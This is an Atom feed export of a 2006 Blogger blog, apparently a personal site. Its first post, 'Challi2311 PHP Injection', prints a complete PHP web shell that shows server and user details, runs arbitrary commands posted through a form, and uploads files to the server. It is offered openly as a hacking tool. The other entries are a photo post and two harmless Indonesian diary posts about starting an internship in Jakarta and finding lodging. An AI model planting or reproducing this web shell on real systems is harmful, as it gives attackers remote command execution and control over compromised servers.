<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-30093381</id><updated>2011-04-21T15:46:37.712-07:00</updated><title type='text'>ChaLLI 2311</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://challi2311.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://challi2311.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>ChaLLI_2311</name><uri>http://www.blogger.com/profile/11292505258351412007</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>4</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-30093381.post-115485623739193406</id><published>2006-08-06T02:22:00.000-07:00</published><updated>2006-08-06T02:29:40.036-07:00</updated><title type='text'></title><content type='html'>&lt;title&gt;CHaLLI2311&lt;/title&gt;&lt;br /&gt;  &lt;center&gt;&lt;br&gt;&lt;font face="Comic Sans MS" size="2"&gt;&lt;b&gt;Everybody know their limits, you just got more than others.&lt;br&gt;&lt;br /&gt;Search in everymind, looking for knowledge. Hacking is an art.&lt;/b&gt;&lt;/font&gt; &lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;img src="http://photos1.blogger.com/blogger/7412/3220/1600/Challi2311.jpg"&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;/center&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;p&gt;&lt;font face="Verdana" size="1"&gt;&lt;br /&gt;&lt;b&gt;#&lt;/b&gt; Challi2311 PHP Injection&lt;br&gt; &lt;br /&gt;&lt;b&gt;#&lt;/b&gt; Released by : &lt;b&gt;Ch W.G&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;  &lt;br /&gt;&lt;/font&gt; &lt;br /&gt;  &lt;/p&gt;&lt;br /&gt;  &lt;hr&gt;&lt;hr&gt;&lt;br /&gt;  &lt;p&gt; &lt;font face="comic sans MS" style="font-size: 9pt"&gt;&lt;b&gt;&lt;br /&gt;  &lt;br&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;/b&gt;&lt;br /&gt;  &lt;br /&gt;&lt;/font&gt;&lt;font face="comic sans MS"&gt;&lt;br /&gt;  &lt;/p&gt;&lt;br /&gt;&lt;div align="left"&gt;&lt;b&gt;&lt;?php&lt;br /&gt;  closelog( );&lt;br /&gt;  $user = get_current_user( );&lt;br /&gt;  $login = posix_getuid( );&lt;br /&gt;  $euid = posix_geteuid( );&lt;br /&gt;  $ver = phpversion( );&lt;br /&gt;  $gid = posix_getgid( );&lt;br /&gt;  if ($chdir == "") $chdir = getcwd( );&lt;br /&gt;  if(!$whoami)$whoami=exec("whoami");&lt;br /&gt;?&gt;&lt;br /&gt;&lt;TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0"&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;  $uname = posix_uname( );&lt;br /&gt;  while (list($info, $value) = each ($uname)) {&lt;br /&gt;?&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;    &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;span style="font-size: 9pt"&gt;&lt;?= $info ?&gt;&lt;br /&gt;      &lt;span style="font-size: 9pt"&gt;:&lt;/b&gt; &lt;?= $value ?&gt;&lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;  }&lt;br /&gt;?&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;User Info:&lt;/b&gt; uid=&lt;?= $login ?&gt;(&lt;?= $whoami?&gt;) euid=&lt;?= $euid ?&gt;(&lt;?= $whoami?&gt;) gid=&lt;?= &lt;br /&gt;&lt;br /&gt;$gid ?&gt;(&lt;?= $whoami?&gt;)&lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;Current Path:&lt;/b&gt; &lt;?= $chdir ?&gt;&lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;Permission Directory:&lt;/b&gt; &lt;? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?&gt;&lt;br /&gt;    &lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;  &lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;Server Services:&lt;/b&gt; &lt;?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?&gt;&lt;br /&gt;    &lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;Server Address:&lt;/b&gt; &lt;?= "$SERVER_ADDR $SERVER_NAME"; ?&gt;&lt;br /&gt;    &lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;Script Current User:&lt;/b&gt; &lt;?= $user ?&gt;&lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;  &lt;TR&gt;&lt;br /&gt;  &lt;TD align="left"&gt;&lt;DIV STYLE="font-family: verdana; font-size: 10px;"&gt;&lt;b&gt;&lt;br /&gt;    &lt;span style="font-size: 9pt"&gt;PHP Version:&lt;/b&gt; &lt;?= $ver ?&gt;&lt;/span&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;br /&gt;  &lt;/TR&gt;&lt;br /&gt;&lt;/TABLE&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;/div&gt;&lt;/font&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;?php&lt;br /&gt;&lt;br /&gt;set_magic_quotes_runtime(0);&lt;br /&gt;&lt;br /&gt;$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);&lt;br /&gt;$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);&lt;br /&gt;&lt;br /&gt;$UName  = `uname -a`;&lt;br /&gt;$SCWD   = `pwd`;&lt;br /&gt;$UserID = `id`;&lt;br /&gt;&lt;br /&gt;if( $currentWD == "" ) {&lt;br /&gt;    $currentWD = $SCWD;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;if( $_POST['_act'] == "List files!" ) {&lt;br /&gt;    $currentCMD = "ls -la";&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;print "&lt;form method=post enctype=\"multipart/form-data\"&gt;&lt;hr&gt;&lt;hr&gt;&lt;table&gt;";&lt;br /&gt;&lt;br /&gt;print "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Execute command:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;input size=100 name=\"_cmd\" value=\"".$currentCMD."\"&gt;&lt;/td&gt;";&lt;br /&gt;print "&lt;td&gt;&lt;input type=submit name=_act value=\"Execute!\"&gt;&lt;/td&gt;&lt;/tr&gt;";&lt;br /&gt;&lt;br /&gt;print "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Change directory:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;input size=100 name=\"_cwd\" value=\"".$currentWD."\"&gt;&lt;/td&gt;";&lt;br /&gt;print "&lt;td&gt;&lt;input type=submit name=_act value=\"List files!\"&gt;&lt;/td&gt;&lt;/tr&gt;";&lt;br /&gt;&lt;br /&gt;print "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Upload file:&lt;/b&gt;&lt;/td&gt;&lt;td&gt;&lt;input size=85 type=file name=_upl&gt;&lt;/td&gt;";&lt;br /&gt;print "&lt;td&gt;&lt;input type=submit name=_act value=\"Upload!\"&gt;&lt;/td&gt;&lt;/tr&gt;";&lt;br /&gt;&lt;br /&gt;print "&lt;/table&gt;&lt;/form&gt;&lt;hr&gt;&lt;hr&gt;";&lt;br /&gt;&lt;br /&gt;$currentCMD = str_replace("\\\"","\"",$currentCMD);&lt;br /&gt;$currentCMD = str_replace("\\\'","\'",$currentCMD);&lt;br /&gt;&lt;br /&gt;if( $_POST['_act'] == "Upload!" ) {&lt;br /&gt;    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {&lt;br /&gt;        print "&lt;center&gt;&lt;b&gt;Error while uploading file!&lt;/b&gt;&lt;/center&gt;";&lt;br /&gt;    } else {&lt;br /&gt;        print "&lt;center&gt;&lt;pre&gt;";&lt;br /&gt;        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2&gt;&amp;1");&lt;br /&gt;        print "&lt;/pre&gt;&lt;b&gt;File uploaded successfully!&lt;/b&gt;&lt;/center&gt;";&lt;br /&gt;    }    &lt;br /&gt;} else {&lt;br /&gt;    print "\n\n&lt;!-- OUTPUT STARTS HERE --&gt;\n&lt;pre&gt;\n";&lt;br /&gt;    $currentCMD = "cd ".$currentWD.";".$currentCMD;&lt;br /&gt;  system("$currentCMD 1&gt; /tmp/cmdtemp 2&gt;&amp;1; cat /tmp/cmdtemp; rm &lt;br /&gt;/tmp/cmdtemp");&lt;br /&gt;    print "\n&lt;/pre&gt;\n&lt;!-- OUTPUT ENDS HERE --&gt;\n\n&lt;/center&gt;&lt;hr&gt;&lt;hr&gt;&lt;center&gt;&lt;b&gt;Command completed&lt;/b&gt;&lt;/center&gt;";&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;exit;&lt;br /&gt;&lt;br /&gt;?&gt;&lt;/body&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;!-- Inserted by DomainDLX.com - Advertisement --&gt;&lt;br /&gt;&lt;br /&gt;&lt;IFRAME src="http://ads.domaindlx.com/default.htm" width="0" height="0" scrolling="auto" frameborder="0"&gt;&lt;br /&gt;&lt;/IFRAME&gt;&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript" src="http://as.casalemedia.com/sd?s=70484&amp;f=1"&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;script language='javascript' src='http://registrarads.com/dotstfreehostads/domaindlx.js'&gt;&lt;/script&gt;&lt;br /&gt;&lt;!-- Inserted by DomainDLX.com - Advertisement --&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/30093381-115485623739193406?l=challi2311.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://challi2311.blogspot.com/feeds/115485623739193406/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=30093381&amp;postID=115485623739193406' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115485623739193406'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115485623739193406'/><link rel='alternate' type='text/html' href='http://challi2311.blogspot.com/2006/08/challi2311-everybody-know-their-limits.html' title=''/><author><name>ChaLLI_2311</name><uri>http://www.blogger.com/profile/11292505258351412007</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-30093381.post-115485495308255140</id><published>2006-08-06T01:55:00.000-07:00</published><updated>2006-08-06T02:08:19.216-07:00</updated><title type='text'></title><content type='html'>&lt;a href="http://photos1.blogger.com/blogger/7412/3220/1600/Challi2311.jpg"&gt;&lt;img style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://photos1.blogger.com/blogger/7412/3220/400/Challi2311.jpg" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/30093381-115485495308255140?l=challi2311.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://challi2311.blogspot.com/feeds/115485495308255140/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=30093381&amp;postID=115485495308255140' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115485495308255140'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115485495308255140'/><link rel='alternate' type='text/html' href='http://challi2311.blogspot.com/2006/08/blog-post.html' title=''/><author><name>ChaLLI_2311</name><uri>http://www.blogger.com/profile/11292505258351412007</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-30093381.post-115427564729815802</id><published>2006-06-12T22:32:00.000-07:00</published><updated>2006-07-30T09:08:06.163-07:00</updated><title type='text'></title><content type='html'>hari ini adalah hari pertamaku masuk kerja. Awalnya aku bengong-bengong aja, ga tau mau kerja apa. Lalu kak Dedi nyuruh aku nginstall sebuah CPU dengan SO Xp. Semuanya berjalan lancar-lancar aja.. !! Setelah itu aku makan siang bareng Agus dan Iden. Tapi nyari warung nasi susah juga, akhirnya kita makan mie aja di Warkop. Setelah itu balik lagi ke B1. Tapi ngga ada kerjaan lagi sampe sore....&lt;br /&gt;&lt;br /&gt;Malamnya kami cari kossan baru. Soalnya kossan lama sudah ngga layak pake. Banyak KECOAKNYA !!!! hehehhe... Maklum laki-laki. Kami keliling Pangkalan Jati 2, tapi ngga ketemu juga.. Akhirnya kami ke Jati 3. Kata si Iden dia pernah liat kossan di sana. Sampai di sana ternyata kontrakan itu sudah penuh. Lalu kami nanya, di mana lagi ada kossan yang masih kosong. Katanya di Gank depan TK ada. Lalu kami ke sana Untung aja masih ada satu yang kosong. Ternyata yang punya adalah Pak haji. Aku, Iden &amp;amp; Agus langsung daftar. Trus anak ibu koss antar kami liat2 kossan. "@@ &lt;em&gt;Anak ibu koss cakep juga guys@@". &lt;/em&gt;Kami diperbolehkan mindahin barang malam itu juga. Lalu kami balik ke B1 dan beritahu teman-teman yang lain. Mereka semua setuju ** &lt;em&gt;ya iyalah !! Siapa yang betah tidur ma KECOAK....**. &lt;/em&gt;Malam itu juga kami semua langsung mindahin barang. ( 'kecuali Iden. Soalnya giliran dia jaga malam' ).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/30093381-115427564729815802?l=challi2311.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://challi2311.blogspot.com/feeds/115427564729815802/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=30093381&amp;postID=115427564729815802' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115427564729815802'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115427564729815802'/><link rel='alternate' type='text/html' href='http://challi2311.blogspot.com/2006/06/hari-ini-adalah-hari-pertamaku-masuk.html' title=''/><author><name>ChaLLI_2311</name><uri>http://www.blogger.com/profile/11292505258351412007</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-30093381.post-115405889314465411</id><published>2006-06-11T22:52:00.000-07:00</published><updated>2006-07-30T15:46:29.646-07:00</updated><title type='text'></title><content type='html'>&lt;p&gt;Hari ini adalah hari pertamaku magang di ICT Centre Jakarta. Awalnya aku datang di Jawis 2, Karena kata kepala sekolahku kantornya ada di Sekolah tersebut. Ternyata kata Penjaga sekolah, kantornya sudah pindah. Untung saja kantor tersebut tidak jauh dari jawis. Jadi aku tidak susah mencarinya. Tiba di B1 aku disambut anak magang juga. yang belakangan ku kenal namanya Agus (Dari Kalimantan Selatan). Hari itu kakak-kakaknya tidak masuk kerja&lt;em&gt;. ya jelas saja... kan hari minggu &lt;img style="width: 15px; height: 16px;" src="http://charlli2311.eponym.com/_images/emoticons/em.icon.bigsmile.gif" height="18" width="28" /&gt; &lt;/em&gt;&lt;/p&gt;&lt;p&gt;&lt;em&gt;&lt;/em&gt;Lalu oleh agus aku dikenalin sama anak magang lainnya. ada Iden dari Rangkas, Pasya dari Rangkas too, Febby dari rangkas, Wina dari Rangkas &lt;img src="http://charlli2311.eponym.com/_images/emoticons/em.icon.dissapprove.gif" /&gt;"&lt;em&gt;wah kak Rizall curang nich. dari rangkas banyak amat. aku cuma diterima satu doank", &lt;/em&gt;Adim dari Bondowoso, Andika dari Magetan, Hunter dari ???? (&lt;em&gt;sorry aku lupa heheeheh&lt;/em&gt;). &lt;/p&gt;&lt;p&gt;siangnya aku makan siang bareng agus, ternyata si Agus baru seminggu juga di sini. Setelah itu aku kembali ke B1 untuk istirahat&lt;em&gt;................. Sleeeeeeeeeepppppp &lt;/em&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/30093381-115405889314465411?l=challi2311.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://challi2311.blogspot.com/feeds/115405889314465411/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=30093381&amp;postID=115405889314465411' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115405889314465411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/30093381/posts/default/115405889314465411'/><link rel='alternate' type='text/html' href='http://challi2311.blogspot.com/2006/06/hari-ini-adalah-hari-pertamaku-magang.html' title=''/><author><name>ChaLLI_2311</name><uri>http://www.blogger.com/profile/11292505258351412007</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry></feed>
